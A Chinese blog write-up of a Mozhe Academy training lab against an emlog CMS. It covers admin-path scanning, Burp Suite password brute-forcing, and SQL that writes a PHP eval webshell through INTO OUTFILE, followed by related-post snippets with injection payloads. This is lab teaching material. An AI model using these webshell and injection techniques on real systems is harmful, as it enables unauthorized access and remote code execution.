墨者学院-CMS系统漏洞分析溯源(第6题)

最新推荐文章于 2024-02-06 20:39:57 发布
最新推荐文章于 2024-02-06 20:39:57 发布
阅读量317 收藏
点赞数
分类专栏: # 墨者学院
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ploto_cs/article/details/109090845
版权

信息安全

CMS系统漏洞分析溯源(第6题)
一.解题思路
得到用户名之后爆破密码登录后台,再写入一句话木马
二.操作步骤
1.御剑扫描
在这里插入图片描述

可以看到后台登录界面为http://ip:port/servlets/

2.后台登录:
已知用户名为mozhe777
在这里插入图片描述

登录后台
在这里插入图片描述
使用Burpsuite抓包,进行暴力破解
设置类型为sniper
在这里插入图片描述

开始攻击
在这里插入图片描述

得到密码为qwer1234

3.成功登录后台,导出数据库,添加一句话
在这里插入图片描述
在这里插入图片描述

在导出的文件中添加以下字段

Drop TABLE IF EXISTS emlog_shell;
Create Table emlog_shell(`cmd` longtext NOT NULL);
Insert INTO emlog_shell VALUES('<?php @eval($_POST[pass]);?>');
Select cmd from emlog_shell into outfile '/var/www/html/pass.php';
Drop TABLE IF EXISTS emlog_shell;

在这里插入图片描述

4.使用蚁剑进行连接
配置参数
在这里插入图片描述

可以看到刚才新生成的pass.php文件
在这里插入图片描述

Key文件位于根目录下
在这里插入图片描述
网络信息安全—ploto

ploto_cs
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CMS系统漏洞分析溯源(第6)
weixin_50698958的博客
10-07 342
靶场: https://www.mozhe.cn/bug/detail/Yy9vUVVqcWNmWEpKdFh4dTFheHVZdz09bW96aGUmozhe 背景介绍 安全工程师"墨者"的朋友搭建一个emlog个人博客系统,为了确保该系统的安全性,请你检测该系统是否存在安全漏洞。 实训目标 1、了解验证码绕过的相关知识; 2、了解后台地址扫描及其他相关漏洞资料; 3、了解后台常用账户密码的利用方式; 解方向 进入后台,找到后台中可利用的地方getshell; 解思路: 1、使用
墨者学院 - CMS系统漏洞分析溯源(第5)
多崎巡礼的博客
10-29 1605
phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php &lt;?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?&gt;   判断如果没有admin_na...
墨者 - CMS系统漏洞分析溯源(第6)
吃肉唐僧的博客
07-22 479
打开环境,根据目提示 上网搜索emlog博客的后台地址,一般为/admin 但是访问失败,应该是改过路径了 用御剑扫描后台(坑点),只扫出以下地址 分别访问这些地址都没有后台的,后来看别人的解思路才发现 别人一扫就出来了(换了很多个版本,珍藏版,目录优化版,加强字典版.....均扫不出,一把泪) 这里参考https://blog.csdn.net/weixin_43884770...
墨者学院CMS系统漏洞分析溯源(第6)
weixin_43884770的博客
12-19 734
墨者学院-CMS系统漏洞分析溯源(第7)——亲妈级教程
ploto_cs的博客
09-30 1184
墨者学院-CMS系统漏洞分析溯源(第7)——亲妈级教程 方法一: 1.通过探测发现该靶场为DEDE-CMS 靶场为20180109 http://host:post/data/admin/ver.txt 为DEDE版本号位置 2.构造请求获取重置密码链接 请求1:http://219.153.49.228:47258/member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=1 重置密
墨者学院_BeesCMS系统漏洞分析溯源
cc_de_csdn的博客
08-22 973
墨者学院——BeesCMS系统漏洞分析溯源 1、打开用御剑扫描出admin/login.php登录界面 2、输入1’报错,存在注入 3、在user处构造代码直接写入shell,注意验证码是要最新的 4.菜刀连接得到KEY 大概是这么个流程,这样就得到KEY。 ...
BeesCMS系统漏洞分析溯源(墨者学院)
weixin_44300286的博客
05-13 1377
0x01、信息收集 拿到网站,先扫描目录,发现有后台登录界面 尝试登录,发现弱口令admin/admin成功进入后台 找到上传文件的地方准备文件上传 但是多次尝试都未能成功,就算普通图片也没法上传 0x02、sql注入 后来发现在登录界面有sql注入 经过尝试发现过滤了一些关键字 user=admin' uni union on seselectlect updatexml('1',concat('~',(seselectlect database())),'1')#&password=123
【Web】内部文件上传系统漏洞分析溯源(获取shell)
HAPPY
07-29 3540
【准备工具】 1.中国菜刀 (可以去官网下载) 官网:http://www.maicaidao.co/ (不建议使用) https://download.csdn.net/download/u014549283/10570976 2.BurpPro 3.火狐浏览器的FoxyProxy Standard插件 【技术要点】 1.新建一句话代码,比如1.txt,内容选择如下 ...
墨者靶场 初级:BeesCMS系统漏洞分析溯源
qq_43233085的博客
01-16 2394
墨者靶场 初级:BeesCMS系统漏洞分析溯源目背景介绍实训目标解方向解步骤 目 背景介绍 某人搭建BeesCMS网站,邀请“墨者”安全工程师测试网站的安全性。 实训目标 1、了解BeesCMS; 2、了解此漏洞形成的原因; 3、掌握此漏洞的利用方式; 解方向 根据网站目录,找到利用漏洞。 提示:网站位于"/var/www/html/"目录下。 解步骤 启动靶机,访问链接,是个企业网...
墨者学院 - WebShell代码分析溯源(第6)
多崎巡礼的博客
08-03 443
审查代码,在图片文件夹中有php(有毒) 使用了回调函数array_map(将用函数去执行每个参数,返回结果)、$_REQUEST、$_POST,通过分析, 类似于第五,用e来接受assert的base64加密的值作为函数,用POST作为密码 使用菜刀连接地址为 ip/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0密码是POST,key文件在/var...
SQL注入讲解-BeesCMS系统漏洞分析溯源
最新发布
Ryongao
02-06 1540
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
CTF-BeesCMS系统漏洞分析溯源
asd158923328的博客
08-21 4647
根据意 漏洞原因:因为BeesCMS后台登陆页面存在sql注入,可以被用来写入一句话木马或者查看管理员密码 进入环境,通过御剑工具扫描网站目录,发现/admin/login.php 首先在用户名 中 输入 ‘ 出现了报错, 确认后台登陆页面的user 有存在sql注入。 然后输入 ‘ or 1=1 # 就返回了正常的登陆失败的页面。 sql 回显可以看出有五个字段 所以尝试 ‘ unio...
墨者学院---CMS系统漏洞分析溯源(第5)
qq_35105713的博客
10-25 1194
 cookie添加 admin_name字段,Value任意。保存 访问http://219.153.49.228:48489/admin/cms_admin.php,即可获得key
墨者 - CMS系统漏洞分析溯源(第5)
吃肉唐僧的博客
07-19 904
御剑一顿乱扫 挖到后台登录地址 卡住了,不知如何入手 后来看到别人的解思路,别人是直接下载了该网站的源码分析, 参考链接:https://www.yuag.org/2016/08/23/phpecms1-3-cookies%E6%AC%BA%E9%AA%97%E6%BC%8F%E6%B4%9E%E8%BF%9B%E5%90%8E%E5%8F%B0/ phpecms1.3/admi...
墨者CMS系统漏洞分析溯源(第4)
zr1213159840的博客
01-28 1117
打开给的链接的页面,能发现是aspcms,还给了一个登录框 通过搜索发现,aspcms存在一个注入漏洞,拿到登录名和密码 http://219.153.49.228:45597//plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 对密码进行一
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值